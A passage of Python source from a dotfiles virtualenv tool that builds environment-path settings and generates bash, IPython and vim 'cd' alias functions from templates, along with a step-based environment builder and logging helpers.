wrap (bool): Add header and footer <event> tags (default: False)
splitlines (bool): split by newlines and emit one log message per line
Returns:
tuple: (event:str, output:str)
"""
eventstr = event.replace('\t', '<tab/>') # XXX: raises
if show_modpath is None:
show_modpath = DEBUG_TRACE_MODPATH
if show_modpath and modpath is None:
modpath = []
_frame = frame = sys._getframe(1)
if _frame:
name = _frame.f_code.co_name
if name == '<module>':
name = _frame.f_globals['__name__']
modpath.append((name, _frame.f_lineno))
while hasattr(_frame, 'f_back'):
_frame = _frame.f_back
if hasattr(_frame, 'f_code') and hasattr(_frame, 'f_lineno'):
name = _frame.f_code.co_name
if name == '<module>':
name = "%s %s" % (
_frame.f_globals['__name__'],
os.path.basename(_frame.f_code.co_filename),
)
modpath.append((name, _frame.f_lineno))
if hasattr(_frame, 'f_globals'):
modpath[-1][0] = _frame.f_globals['__name__']
funcstr = None
if func is not None:
funcstr = getattr(func, '__name__',
func if isinstance(func, STR_TYPES)
else None)
if modpath:
modpath.append((funcstr,))
if modpath:
funcstr = ' '.join("%s +%d" % (x,y) for x, y in modpath)
def add_event_prefix(eventstr, line, funcstr=funcstr):
if funcstr:
fmtstr = '{eventstr}\t{line}\t##{funcstr}'
else:
fmtstr = '{eventstr}\t{line}'
return fmtstr.format(
eventstr=eventstr,
line=line,
funcstr=funcstr)
def _log(event, output):
logger.log(level, add_event_prefix(event, output))
if wrap:
_log(event, '# <{eventstr}>'.format(eventstr=eventstr))
output = None
if hasattr(obj, 'to_json'):
output = obj.to_json(indent=2)
else:
output = pprint.pformat(obj)
if splitlines:
for line in output.splitlines():
_log(event, line) # TODO: comment?
else:
_log(event, output)
if wrap:
_log(event, '# </{eventstr}>'.format(eventstr=eventstr))
return (event, output)
# Exception classes
class ConfigException(Exception):
pass
class StepException(Exception):
pass
class StepConfigException(StepException, ConfigException):
pass
def prepend_comment_char(strblock, commentchar="##"):
"""
Args:
strblock (str): string to split by newlines and prepend
prefix (str): comment string prefix (one space will be added)
Yields:
str: lines prefixed with prefix
"""
for line in strblock.splitlines():
yield " ".join((commentchar, line))
# Constant getters (for now)
def get_pyver(pyverstr=None):
"""
Args:
pyver (str): "major.minor" e.g. ``2.7`` or ``3.4``
(default: ``sys.version_info[:2]``)
Returns:
str: ``python2.7``, ``python.34``
"""
if pyverstr is None:
pyver = 'python%d.%d' % sys.version_info[:2]
else:
pyver = 'python%s' % pyverstr
return pyver
def get___WRK_default(env=None, **kwargs):
if env is None:
env = Env()
__WRK = kwargs.get('__WRK',
env.get('__WRK',
os.path.expanduser('~/-wrk')))
log.debug('get__WRK\t%s' % {'__WRK': __WRK,
'env[__WRK]': env.get('__WRK')})
return __WRK
def get_WORKON_HOME_default(env=None,
from_environ=False,
default='-ve27',
**kwargs):
"""
Keyword Arguments:
env (dict): Env dict to read from (default: None)
from_environ (bool): read WORKON_HOME from os.environ
default (str): default WORKON_HOME dirname
__WRK (str):
Returns:
str: path to a ``WORKON_HOME`` directory
"""
__WORKON_HOME_DEFAULT = default
if env is None:
if from_environ:
env = Env.from_environ(os.environ) # TODO: os.environ.copy()
else:
env = Env()
env['__WRK'] = kwargs.get('__WRK',
env.get('__WRK',
get___WRK_default(env=env)))
workon_home = env.get('WORKON_HOME') # TODO: WORKON_HOME_DEFAULT
if workon_home:
return workon_home
python27_home = env.get('WORKON_HOME__py27')
if python27_home:
workon_home = python27_home
return workon_home
else:
python27_home = joinpath(env['__WRK'], __WORKON_HOME_DEFAULT)
workon_home = python27_home
return workon_home
workon_home = os.path.expanduser('~/.virtualenvs/')
if os.path.exists(workon_home):
return workon_home
workon_home = joinpath(env['__WRK'], __WORKON_HOME_DEFAULT)
return workon_home
class VenvJSONEncoder(json.JSONEncoder):
def default(self, obj):
if hasattr(obj, 'to_dict'):
return dict(obj.to_dict())
if isinstance(obj, OrderedDict):
# TODO: why is this necessary?
return dict(obj)
if hasattr(obj, 'to_bash_function'):
return obj.to_bash_function()
if hasattr(obj, 'to_shell_str'):
return obj.to_shell_str()
if isinstance(obj, CdAlias):
# return dict(type="cdalias",value=(obj.name, obj.pathvar))
return obj.pathvar
return json.JSONEncoder.default(self, obj)
##############
# define aliases as IPython aliases (which support %l and %s,%s)
# which can then be transformed to:
# * ipython aliases ("echo %l; ping -t %s -n %s")
class CmdAlias(object):
"""
"""
def __init__(self, cmdstr):
"""
Args:
cmdstr (str): command alias
"""
self.cmdstr = cmdstr
def to_shell_str(self, name=None):
"""
Generate an alias or function for bash/zsh
Keyword Arguments:
name (str): funcname to override default
Returns:
str: self.cmdstr (AS-IS)
"""
return self.cmdstr
def to_ipython_alias(self):
"""
Generate an alias for IPython
Returns:
str: self.cmdstr (AS-IS)
"""
return self.cmdstr
#def to_vim_function(self):
# """
# Generate a vim function
# Raises:
# NotImplemented: See IpyAlias.to_vim_function
# str: self.cmdstr (AS-IS)
# """
# raise NotImplemented
__str__ = to_shell_str
__repr__ = to_shell_str
class IpyAlias(CmdAlias):
"""
An IPython alias command string
which expands to a shell function ``aliasname() { ... }``
and handles positional args ``%s`` and ``%l``
References:
* TODO: IPython docs
"""
def __init__(self, cmdstr, name=None, complfuncstr=None):
"""
Args:
cmdstr (str): if cmdstr contains ``%s`` or ``%l``,
it will be expanded to a shell function
Keyword Arguments:
name (str): None to set at serialization
(so that ``$ type cmd`` shows the actual command)
"""
self.name = name
self.cmdstr = cmdstr
self.complfuncstr = complfuncstr
def to_shell_str(self, name=None):
"""
Generate an alias or function for bash/zsh
Keyword Arguments:
name (str): funcname to override default
Returns:
str: an ``alias`` or a ``function()``
.. code:: bash
alias name=repr(cmdstr)
# or
cmdname () {
cmdstr
}
"""
alias = self.cmdstr
name = getattr(self, 'name') if name is None else name
if '%s' in alias or '%l' in alias:
# alias = '# %s' % alias
# chunks = alias.split('%s')
_alias = alias[:]
count = 0
while '%s' in _alias:
count += 1
_alias = _alias.replace('%s', '${%d}' % count, 1)
_aliasmacro_tmpl = (
u'eval \'{funcname} () {{\n {funcstr}\n}}\';')
_aliasmacro = _aliasmacro_tmpl.format(
funcname=name,
funcstr=_alias)
_aliasmacro = _aliasmacro.replace('%l', '${@}')
if self.complfuncstr:
complfuncname = '_%s__complete' % name
_aliasmacro = u'%s\n%s\ncomplete -o default -o nospace -F %s %s ;' % (
_aliasmacro,
_aliasmacro_tmpl.format(
funcname=complfuncname,
funcstr=self.complfuncstr.strip()),
complfuncname,
name)
return _aliasmacro
# TODO: repr(alias) / shell_quote / mangling #XXX
return 'alias {}={} ;'.format(name, repr(alias))
class CdAlias(CmdAlias):
"""
A CmdAlias for ``cd`` change directory
functions with venv paths (e.g. $_WRD)
for Bash, ZSH, IPython, Vim.
* venv.sh bash functions with tab-completion (cdwrd, cdw, cdw<tab>)
* venv_ipymagics.py: ipython magics (%cdwrd, cdwrd, cdw)
* venv.vim: vim functions (:Cdwrd)
"""
def __init__(self, pathvar, name=None, aliases=None):
"""
Args:
pathvar (str): path variable to cd to
Keyword Arguments:
name (str): alias name (default: ``pathvar.lower.replace('_','')``)
_WRD -> cdwrd, :Cdwrd
WORKON_HOME -> workonhome
aliases (list[str]): additional alias names (e.g. ['cdw',])
.. py:attribute:: BASH_ALIAS_TEMPLATE
.. py:attribute:: BASH_FUNCTION_TEMPLATE
.. py:attribute:: BASH_COMPLETION_TEMPLATE
.. py:attribute:: VENV_IPYMAGICS_FILE_HEADER
.. py:attribute:: VENV_IPYMAGIC_METHOD_TEMPLATE
.. py:attribute:: VIM_CD_COMMAND_TEMPLATE
.. py:attribute:: VIM_CD_FUNCTION_TEMPLATE
"""
self.pathvar = pathvar
self.cmdstr = "cd {}".format(self.pathvar)
if name is None:
name = pathvar.lower().replace('_', '')
self.name = name
if aliases is None:
aliases = list()
self.aliases = aliases
VENV_IPYMAGICS_FILE_HEADER = (
'''
#!/usr/bin/env ipython
# dotfiles.venv.venv_ipymagics
from __future__ import print_function
"""
IPython ``%magic`` commands
* ``cd`` aliases
* ``ds`` (``dotfiles_status``)
* ``dr`` (``dotfiles_reload``)
Installation
--------------
.. code-block:: bash
__DOTFILES="${HOME}/-dotfiles"
ipython_profile="profile_default"
ln -s ${__DOTFILES}/etc/ipython/venv_ipymagics.py \\
~/.ipython/${ipython_profile}/startup/venv_ipymagics.py
"""
import os
import sys
try:
from IPython.core.magic import (Magics, magics_class, line_magic)
except ImportError:
print("ImportError: IPython")
# Mock IPython for building docs
Magics = object
magics_class = lambda cls, *args, **kwargs: cls
line_magic = lambda func, *args, **kwargs: func
if sys.version_info.major == 2:
str = unicode
def ipymagic_quote(_str):
return str(_str)
@magics_class
class VenvMagics(Magics):
def cd(self, envvar, line):
"""
Change directory
Args:
envvar (str): os.environ variable name
line (str): path to append to envvar
"""
prefix = os.environ.get(envvar, "")
_dstpath = line.lstrip(os.path.sep)
path = os.path.join(prefix, _dstpath)
cmd = ("cd %s" % ipymagic_quote(path))
print("%" + cmd, file=sys.stderr)
return self.shell.magic(cmd)''')
VENV_IPYMAGIC_METHOD_TEMPLATE = (
'''
@line_magic
def {ipy_func_name}(self, line):
"""{ipy_func_name} -- cd ${pathvar}/${{@}}"""
return self.cd('{pathvar}', line)''')
VENV_IPYMAGICS_FOOTER = (
'''
@line_magic
def cdhelp(self, line):
"""cdhelp() -- list cd commands"""
for cdfunc in dir(self):
if cdfunc.startswith('cd') and cdfunc not in ('cdhelp','cd'):
docstr = getattr(self, cdfunc).__doc__.split('--',1)[-1].strip()
print("%%%-16s -- %s" % (cdfunc, docstr))
@staticmethod
def _dotfiles_status():
"""
Print ``dotfiles_status``: venv variables
"""
env_vars = [
'HOSTNAME',
'USER',
'PROJECT_HOME',
'CONDA_ROOT',
'CONDA_ENVS_PATH',
'WORKON_HOME',
'VIRTUAL_ENV_NAME',
'VIRTUAL_ENV',
'_USRLOG',
'_TERM_ID',
'_SRC',
'_APP',
'_WRD',
'PATH',
'__DOTFILES',
]
environ = dict((var, os.environ.get(var)) for var in env_vars)
environ['HOSTNAME'] = __import__('socket').gethostname()
for var in env_vars:
print('{}="{}"'.format(var, "%s" % environ.get(var,'')))
@line_magic
def dotfiles_status(self, line):
"""dotfiles_status() -- print dotfiles_status() ."""
return self._dotfiles_status()
@line_magic
def ds(self, line):
"""ds() -- print dotfiles_status() ."""
return self._dotfiles_status()
@staticmethod
def _dotfiles_reload():
"""_dotfiles_reload() -- print NotImplemented"""
print("NotImplemented: dotfiles_reload()")
@line_magic
def dotfiles_reload(self, line):
"""dotfiles_reload() -- print NotImplemented"""
return self._dotfiles_reload()
@line_magic
def dr(self, line):
"""dr() -- print NotImplemented [dotfiles_reload()]"""
return self._dotfiles_reload()
def main():
"""
Register VenvMagics with IPython
"""
import IPython
ip = IPython.get_ipython()
ip.register_magics(VenvMagics)
if __name__ == "__main__":
main()
''')
def to_ipython_method(self):
"""
Keyword Arguments:
include_completions (bool): generate inline Bash completions
Returns:
str: ipython method block
"""
for cmd_name in self.bash_func_names:
yield (CdAlias.VENV_IPYMAGIC_METHOD_TEMPLATE.format(
pathvar=self.pathvar,
ipy_func_name=cmd_name))
VIM_HEADER_TEMPLATE = (
'''\n'''
'''" ### venv.vim\n'''
'''" # Src: https://github.com/westurner/venv.vim\n\n'''
'''" "g:venv_list_only_dirs -- 1 -- 0 to list files in Cd* commands\n\n'''
'''let g:venv_list_only_dirs = 1\n'''
'''\n'''
'''function! Cd_help()\n'''
'''" :Cdhelp -- list venv.vim cdalias commands\n'''
''' :verbose command Cd\n'''
'''endfunction\n'''
'''command! -nargs=0 Cdhelp call Cd_help()\n'''
'''\n'''
'''function! ListDirsOrFiles(path, ArgLead, ...)\n'''
''' let dirsonly = ((a:0>0) ? 1 : g:venv_list_only_dirs)\n'''
''' let _glob = '' . a:ArgLead . ((g:venv_list_only_dirs>1) ? '*/' : '*')\n'''
''' execute 'lcd' a:path\n'''
''' if dirsonly ==? 1\n'''
''' let output = map(sort(globpath('.', _glob, 0, 1), 'i'), 'v:val[2:]')\n'''
''' elseif dirsonly ==? 0\n'''
''' let output = map(sort(globpath('.', _glob, 0, 1), 'i'), 'v:val[2:] . (isdirectory(v:val) ? "/" : "")')\n'''
''' endif\n'''
''' execute 'lcd -'\n'''
''' return output\n'''
'''endfunction\n'''
'''\n'''
'''function! Cdhere(...)\n'''
'''" :Cdhere -- cd to here (this dir, dirname(__file__)) [cd %:p:h]\n'''
'''" :CDhere -- cd to here (this dir, dirname(__file__)) [cd %:p:h]\n'''
''' let _path = expand('%:p:h') . ((a:0>0) ? ('/' . a:1) : '')\n'''
''' execute 'cd' _path\n'''
''' pwd\n'''
'''endfunction\n'''
'''function! Compl_Cdhere(ArgLead, ...)\n'''
''' return ListDirsOrFiles(expand('%:p:h'), a:ArgLead, 1)\n'''
'''endfor\n'''
'''endfunction\n'''
'''command! -nargs=* -complete=customlist,Compl_Cdhere Cdhere call Cdhere(<f-args>)\n'''
'''command! -nargs=* -complete=customlist,Compl_Cdhere CDhere call Cdhere(<f-args>)\n'''
'''\n'''
'''function! Lcdhere(...)\n'''
'''" :Lcdhere -- lcd to here (this dir, dirname(__file__)) [lcd %:p:h]\n'''
'''" :LCdhere -- lcd to here (this dir, dirname(__file__)) [lcd %:p:h]\n'''
''' let _path = expand('%:p:h') . ((a:0>0) ? ('/' . a:1) : '')\n'''
''' execute 'lcd' _path\n'''
''' pwd\n'''
'''endfunction\n'''
'''command! -nargs=* -complete=customlist,Compl_Cdhere Lcdhere call Lcdhere(<f-args>)\n'''
'''command! -nargs=* -complete=customlist,Compl_Cdhere LCdhere call Lcdhere(<f-args>)\n'''
'''\n'''
'''\n'''
'''function! Cd___VAR_(varname, cmd, ...)\n'''
'''" Cd___VAR_() -- cd expand('$' . a:varname)/$1\n'''
''' let _VARNAME = a:varname\n'''
''' let _VAR_=expand(_VARNAME)\n'''
''' if _VARNAME ==? _VAR_\n'''
''' echoerr _VARNAME . " is not set"\n'''
''' return\n'''
''' endif\n'''
''' let pathname = join([_VAR_, (a:0>0) ? a:1 : ""], "/")\n'''
''' execute a:cmd pathname\n'''
''' pwd\n'''
'''endfunction\n'''
'''\n'''
)
VIM_CD_FUNCTION_TEMPLATE = (
'''\n'''
'''function! {vim_func_name}(...)\n'''
'''" {vim_func_name}() -- cd ${pathvar}/$1\n'''
''' call Cd___VAR_('${pathvar}', '{vim_cd_func}', (a:0>0)? a:1 : "")\n'''
'''endfunction\n'''
'''function! Compl_{vim_func_name}(ArgLead, ...)\n'''
''' return ListDirsOrFiles(${pathvar}, a:ArgLead, 1)\n'''
'''endfunction\n'''
)
VIM_CD_COMMAND_TEMPLATE = (
'''" :{cmd_name:<10} -- cd ${pathvar}/$1\n'''
"""command! -nargs=* -complete=customlist,Compl_{vim_func_name} {cmd_name} call {vim_func_name}(<f-args>)\n"""
)
VIM_EDIT_FUNCTION_TEMPLATE = (
'''\n'''
'''function! {vim_func_name}(...)\n'''
'''" {vim_func_name}() -- e ${pathvar}/$1\n'''
''' let _path=expand("${pathvar}") . ((a:0>0)? "/" . a:1 : "")\n'''
''' execute '{vim_edit_func}' _path\n'''
'''endfunction\n'''
'''function! Compl_{vim_func_name}(ArgLead, ...)\n'''
''' return ListDirsOrFiles(${pathvar}, a:ArgLead, 0)\n'''
'''endfunction\n'''
)
VIM_EDIT_COMMAND_TEMPLATE = (
'''" :{cmd_name:<10} -- e ${pathvar}/$1\n'''
"""command! -nargs=* -complete=customlist,Compl_{vim_func_name} {cmd_name} call {vim_func_name}(<f-args>)\n"""
)
@property
def vim_cmd_name(self):
"""
Returns:
str: e.g "Cdwrd"
"""
return "Cd{}".format(self.name)
@property
def vim_cmd_names(self):
"""
Returns:
list: self.vim_cmd_name + self.aliases.title()
"""
return list(collections.OrderedDict.fromkeys([self.vim_cmd_name, ] +
[alias.title() for alias in self.aliases
if not alias.endswith('-')]).keys())
def to_vim_function(self):
"""
Returns:
str: vim function block
"""
# cdalias commands
confs = cdalias_confs = []
conf = {}
conf['pathvar'] = self.pathvar
conf['vim_func_name'] = "Cd_" + self.pathvar
conf['vim_cmd_name'] = self.vim_cmd_name
conf['vim_cmd_names'] = self.vim_cmd_names
conf['vim_cd_func'] = 'cd'
confs.append(conf)
conf2 = conf.copy()
conf2['vim_func_name'] = "L" + conf['vim_func_name']
conf2['vim_cmd_name'] = "L" + conf['vim_cmd_name']
conf2['vim_cmd_names'] = ["L{}".format(x) for x in conf['vim_cmd_names']]
conf2['vim_cmd_names'] += ["L{}".format(x).title() for x in conf['vim_cmd_names']]
conf2['vim_cd_func'] = 'lcd'
confs.append(conf2)
output = []
for conf in confs:
output.append(CdAlias.VIM_CD_FUNCTION_TEMPLATE.format(**conf))
for cmd_name in conf['vim_cmd_names']:
output += (CdAlias.VIM_CD_COMMAND_TEMPLATE
.format(cmd_name=cmd_name,
pathvar=conf['pathvar'],
vim_func_name=conf['vim_func_name']),)
# edit_commands
edit_cmd_names = list(collections.OrderedDict.fromkeys(
[x[3:] for x in conf['vim_cmd_names'][1:]]).keys())
confs = edit_cmd_confs = []
conf3 = conf.copy()
conf3['vim_func_name'] = "E" + self.pathvar
conf3['vim_cmd_name'] = "E" + self.pathvar
conf3['vim_cmd_names'] = ["E{}".format(x) for x in edit_cmd_names]
# conf3['vim_cmd_names'] += ["E{}".format(x).title() for x in edit_cmd_names]
conf3['vim_edit_func'] = 'e'
confs.append(conf3)
conf4 = conf.copy()
conf4['vim_func_name'] = "Tabnew" + self.pathvar
conf4['vim_cmd_name'] = "Tabnew" + self.pathvar
conf4['vim_cmd_names'] = ["Tabnew{}".format(x) for x in edit_cmd_names]
# conf4['vim_cmd_names'] += ["Tabnew{}".format(x).title() for x in edit_cmd_names]
conf4['vim_edit_func'] = 'tabnew'
confs.append(conf4)
for conf in confs:
output.append(CdAlias.VIM_EDIT_FUNCTION_TEMPLATE.format(**conf))
for cmd_name in conf['vim_cmd_names']:
output += (CdAlias.VIM_EDIT_COMMAND_TEMPLATE
.format(cmd_name=cmd_name,
pathvar=conf['pathvar'],
vim_func_name=conf['vim_func_name']),)
output.append(
'''\n'''
)
return u''.join(output)
BASH_CDALIAS_HEADER = (
'''#!/bin/sh\n'''
"""## venv.sh\n"""
"""# generated from $(venv --print-bash --prefix=/)\n"""
"""\n""")
BASH_FUNCTION_TEMPLATE = (
"""{bash_func_name} () {{\n"""
""" # {bash_func_name:16} -- cd ${pathvar} /$@\n"""
""" [ -z "${pathvar}" ] && echo "{pathvar} is not set" && return 1\n"""
""" cd "${pathvar}"${{@:+"/${{@}}"}}\n"""
"""}}\n"""
"""{bash_compl_name} () {{\n"""
""" local cur="$2";\n"""
""" COMPREPLY=($({bash_func_name} && compgen -d -- "${{cur}}" ))\n"""
"""}}\n"""
)
BASH_ALIAS_TEMPLATE = (
"""{cmd_name} () {{\n"""
""" # {cmd_name:16} -- cd ${pathvar}\n"""
""" {bash_func_name} $@\n"""
"""}}\n"""
)
BASH_COMPLETION_TEMPLATE = (
"""complete -o default -o nospace -F {bash_compl_name} {cmd_name}\n"""
)
@property
def bash_func_name(self):
"""
Returns:
str: e.g. "cdwrd"
"""
return "cd{}".format(self.name)
@property
def bash_func_names(self):
"""
Returns:
list: self.bash_func_name + self.aliases
"""
return [self.bash_func_name, ] + self.aliases
def to_bash_function(self, include_completions=True):
"""
Keyword Arguments:
include_completions (bool): generate inline Bash completions
Returns:
str: bash function block
"""
conf = {}
conf['pathvar'] = self.pathvar
conf['bash_func_name'] = self.bash_func_name
conf['bash_func_names'] = self.bash_func_names
conf['bash_compl_name'] = "_cd_%s_complete" % self.pathvar
def _iter_bash_function(conf):
yield (CdAlias.BASH_FUNCTION_TEMPLATE.format(**conf))
for cmd_name in conf['bash_func_names'][1:]:
yield (CdAlias.BASH_ALIAS_TEMPLATE
.format(cmd_name=cmd_name,
pathvar=conf['pathvar'],
bash_func_name=conf['bash_func_name']))
if include_completions:
for cmd_name in conf['bash_func_names']:
yield (CdAlias.BASH_COMPLETION_TEMPLATE
.format(cmd_name=cmd_name,
bash_compl_name=conf['bash_compl_name']))
return ''.join(_iter_bash_function(conf))
# def to_shell_str(self):
# return 'cd {}/%l'.format(shell_varquote(self.PATH_VARIABLE))
def to_shell_str(self):
"""
Returns:
str: eval \'{_to_bash_function()}\'
"""
return """eval \'\n{cmdstr}\n\';""".format(
cmdstr=self.to_bash_function())
__str__ = to_shell_str
#######################################
# def build_*_env(env=None, **kwargs):
# return env
#######################################
class Step(object):
"""
A build task step which builds or transforms an
:py:mod:`Env`, by calling ``step.build(env=env, **step.conf)``
"""
def __init__(self, func=None, **kwargs):
"""
Keyword Arguments:
func (callable): ``function(env=None, **kwargs)``
name (str): a name for the step
conf (dict): a configuration dict (instead of kwargs) for this step
"""
if not func:
func = self.DEFAULT_FUNC
self.func = func
self._name = kwargs.get('name')
self.build = func
# remove env from the conf dict # XXX
kwargs.pop('env', None)
# conf = kwargs if conf=None
self.conf = kwargs.get('conf', kwargs)
@property
def name(self):
"""
Returns:
str: a name for this Step
"""
namestr = getattr(self.func, '__name__', self.func)
if self._name is not None:
namestr = "%s %s" % (self._name, namestr)
return namestr
@name.setter
def __set_name(self, name):
self._name = name
def __str__(self):
return '<step name=%s>' % (self.name)
def __repr__(self):
return '<step name=%s>' % (self.name)
def _iteritems(self):
"""
Yields:
tuple: ('attrname', obj)
"""
yield ('name', self.name)
yield ('func', self.func)
yield ('conf', self.conf)
def asdict(self):
"""
Returns:
OrderedDict: OrderedDict(self._iteritems())
"""
return OrderedDict(self._iteritems())
def build_print_kwargs_env(self, env=None, **kwargs):
"""
Default ``build_*_env`` Step.func function to print ``env``
Keyword Arguments:
env (:py:mod:`Env`): Env object (default: None)
kwargs (dict): kwargs dict
Returns:
:py:mod:`Env`: updated Env
"""
if env is None:
env = Env()
else:
# Note: StepBuilder also does env.copy before each step
# making this unnecessary for many build_*_env functions
env = env.copy()
env['kwargs'] = kwargs
output = env.to_json()
logevent('build_print_kwargs_env', comment_comment(output))
env.pop('kwargs', None)
return env
DEFAULT_FUNC = build_print_kwargs_env
func = DEFAULT_FUNC
def build(self, env=None, **kwargs):
"""
Call ``self.func(env=env, **self.conf.copy().update(**kwargs))``
Keyword Arguments:
env (Env): Env object (default: None)
kwargs (dict): kwargs dict
Returns:
obj: ``self.func(env=env, **self.conf.copy().update(**kwargs))``
"""
conf = self.conf.copy()
conf.update(kwargs) # TODO: verbose merge
return self.func(env=env, **conf)
class PrintEnvStep(Step):
"""
Print env and kwargs to stdout
"""
_name = 'print_env'
stdout = sys.stdout
stderr = sys.stderr
func = Step.build_print_kwargs_env
class PrintEnvStderrStep(PrintEnvStep):
"""
Print env and kwargs to stderr
"""
_name = 'print_env_stderr'
stdout = sys.stderr
class StepBuilder(object):
"""
A class for building a sequence of steps which modify env
"""
def __init__(self, **kwargs):
# conf=None, steps=None, show_diffs=False, debug=False
"""
Keyword Argumentss:
conf (dict): initial configuration dict
show_diffs and debug overwrite
steps (list): initial list of Step() instances (default: None)
show_diffs (bool): show diffs of Envs between steps
debug (bool): show debugging output
"""
self.steps = kwargs.pop("steps", list())
self.conf = kwargs.get('conf', OrderedDict())
self.conf["show_diffs"] = kwargs.get(
'show_diffs',
self.conf.get('show_diffs'))
self.conf["debug"] = kwargs.get('debug', self.conf.get('debug'))
logevent('StepBuilder %s %s' % (self.name, '__init__'))
@property
def name(self):
return getattr(self, '_name', str(hex(id(self))))
@property
def debug(self):
"""
Returns:
str: self.conf.get('debug')
"""
return self.conf.get('debug')
@property
def show_diffs(self):
"""
Returns:
str: self.conf.get('show_diffs')
"""
return self.conf.get('show_diffs')
def add_step(self, func, **kwargs):
"""
Add a step to ``self.steps``
Args:
func (Step or function or str): ``func(env=None, **kwargs)``
kwargs (dict): kwargs for Step.conf
Keyword Arguments:
name (str): function name (default: None)
Returns:
:py:mod:`Step`: Step object appended to self.steps
"""
if isinstance(func, Step):
step = func(**kwargs)
elif isinstance(func, STR_TYPES):
step = PrintEnvStep(name=func)
elif callable(func):
step = Step(func, name=kwargs.get('name'), conf=kwargs)
else:
raise StepConfigException({
'func': func,
'msg': 'func must be a (Step, STR_TYPES, callable)'})
self.steps.append(step)
return step
def build_iter(self, env=None, show_diffs=True, debug=False):
"""
Build a generator of (Step, Env) tuples from the
functional composition of StepBuilder.steps
given an initial :py:mod:`Env` (or None).
.. code:: python
# pseudocode
env_previous = Env()
for step in self.steps:
(step, env) = step.build(env=env_previous.copy(),**conf)
env_previous=env
Keyword Arguments:
env (Env): initial Env (default: None)
show_diffs (bool): show difflib.ndiffs of Envs between steps
debug (bool):
Yields:
tuple: (:py:mod:`Step`, :py:mod:`Env`)
"""
if env:
env0 = env
env = env0.copy()
else:
env = Env()
yield (PrintEnvStep('env0'), env)
output = sys.stdout
# log = global log
for step in self.steps:
logevent('BLD %s build %s' % (self.name, step.name),
str_center(u" %s " % step.name, 79, '#'),)
logevent('%s build.conf' % step.name, self.conf, wrap=True)
logevent('%s step.conf ' % step.name, step.conf, wrap=True)
logevent('%s >>> %s' % (step.name, hex(id(env))),
env, wrap=True)
env = env.copy()
conf = self.conf.copy()
conf.update(**step.conf)
new_env = step.build(env=env, **conf)
logevent('%s >>> %s' % (step.name, hex(id(new_env))),
new_env,
wrap=True)
if isinstance(new_env, Env):
# logevent('%s new_env' % step.name, new_env, wrap=True)
if self.show_diffs and env:
diff_output = env.ndiff(new_env)
logevent('%s <diff>' % step.name)
for line in diff_output:
logevent('diff', line.rstrip())
logevent('%s </diff>' % step.name)
yield (step, new_env)
env = new_env
else:
logevent("# %r returned %r which is not an Env"
% (step.name, new_env))
logevent('%s stepdict' % step.name, step.__dict__, wrap=True)
def build(self, *args, **kwargs):
"""
Build a list of Envs from ``self.build_iter(*args, **kwargs)``
and return the last Env.
Keyword Arguments:
debug (bool): log.debug(env)
Returns:
Env or None: the last env returned from ``.build_iter``
"""
debug = kwargs.get('debug', self.debug)
step_envs = []
logevent('BLD %s %s' % (self.name, 'build'))
for env in self.build_iter(*args, **kwargs):
step_envs.append(env)
if debug:
log.debug(env)
if step_envs:
return_env = step_envs[-1]
else:
return_env = None
logevent('BLD %s %s' % (self.name, 'build-out'),
env.to_json(indent=2) if hasattr(return_env, 'to_json') else return_env,
wrap=True)
return return_env
# return step_envs
def lookup_from_kwargs_env(kwargs, env, attr, default=None):
"""
__getitem__ from kwargs, env, or default.
Args:
kwargs (dict): kwargs dict
env (Env): :py:mod:`Env` dict
attr (str): attribute name
default (obj): default value to return if not found in kwargs or env
Returns:
obj: kwargs.get(attr, env.get(attr, default))
"""
return kwargs.get(attr, env.get(attr, default))
def build_dotfiles_env(env=None,
**kwargs):
"""
Configure dotfiles base environment (HOME, __WRK, __SRC, __DOTFILES)
Keyword Arguments:
env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
HOME (str): home path (``$HOME``, ``~``)
__WRK (str): workspace path (``$__WRK``, ``~/-wrk``)
__SRC (str): path to source repos (``$__WRK/-src``)
__DOTFILES (str): current dotfiles path (``~/-dotfiles``)
Returns:
env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
Sets:
* HOME
* __WRK
* __SRC
* __DOTFILES
"""
if env is None:
env = Env()
def lookup(attr, default=None):
return lookup_from_kwargs_env(kwargs, env, attr, default=default)
env['HOME'] = lookup('HOME', default=os.path.expanduser('~'))
env['__WRK'] = lookup('__WRK', default=get___WRK_default(env))
env['__SRC'] = lookup('__SRC', default=joinpath(env['__WRK'], '-src'))
env['__DOTFILES'] = lookup('__DOTFILES',
default=joinpath(env['HOME'], '-dotfiles'))
return env
# DEFAULT_WORKON_HOME_DEFAULT (str): variable holding path to WORKON_HOME
DEFAULT_WORKON_HOME_DEFAULT = "WORKON_HOME__py27"
def build_virtualenvwrapper_env(env=None, **kwargs):
"""
Set WORKON_HOME to WORKON_HOME or WORKON_HOME_DEFAULT
Keyword Arguments:
env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
__WRK (str): workspace path (``$__WRK``, ``~/-wrk``)
WORKON_HOME_DEFAULT (str): variable name (default: ``WORKON_HOME__py27``)
WORKON_HOME__* (str): path to a WORKON_HOME set
Returns:
env (Env dict): :py:class:`dotfiles.venv.venv_ipyconfig.Env`
Sets:
* WORKON_HOME__py27='${__WRK}/-ve27'
* WORKON_HOME__py34='${__WRK}/-ve34'
* WORKON_HOME__*=kwargs.get(WORKON_HOME__*)
* WORKON_HOME_DEFAULT='WORKON_HOME_py27'
"""
if env is None:
env = Env()
def lookup(attr, default=None):
return lookup_from_kwargs_env(kwargs, env, attr, default=default)
env['__WRK'] = lookup('__WRK', default=get___WRK_default(env=env))
env['PROJECT_HOME'] = lookup('PROJECT_HOME',
default=env['__WRK']) # cdprojecthome cdph
#env['PYTHON27_ROOT'] = joinpath(env['__WRK'], '-python27')
env['WORKON_HOME__py27'] = lookup('WORKON_HOME__py27',
default=joinpath(env['__WRK'], '-ve27'))
#env['PYTHON34_ROOT'] = joinpath(env['__WRK'], '-python34')
env['WORKON_HOME__py34'] = lookup('WORKON_HOME__py34',
default=joinpath(env['__WRK'], '-ve34'))
for key in kwargs:
if key.startswith("WORKON_HOME__"):
env[key] = kwargs.get(key)
env['WORKON_HOME_DEFAULT'] = lookup('WORKON_HOME_DEFAULT',
default=DEFAULT_WORKON_HOME_DEFAULT)
env['WORKON_HOME'] = lookup('WORKON_HOME',
default=env.get(env.get('WORKON_HOME_DEFAULT')))
# cdworkonhome cdwh
return env
def build_conda_env(env=None, **kwargs):
"""
Configure conda27 (2.7) and conda (3.4)
with condaenvs in ``-wrk/-ce27`` and ``-wrk/ce34``.
Other Parameters:
__WRK (str): workspace root (``$__WRK``, ``~/-wrk``)
CONDA_ROOT__py27 (str): path to conda27 root environment
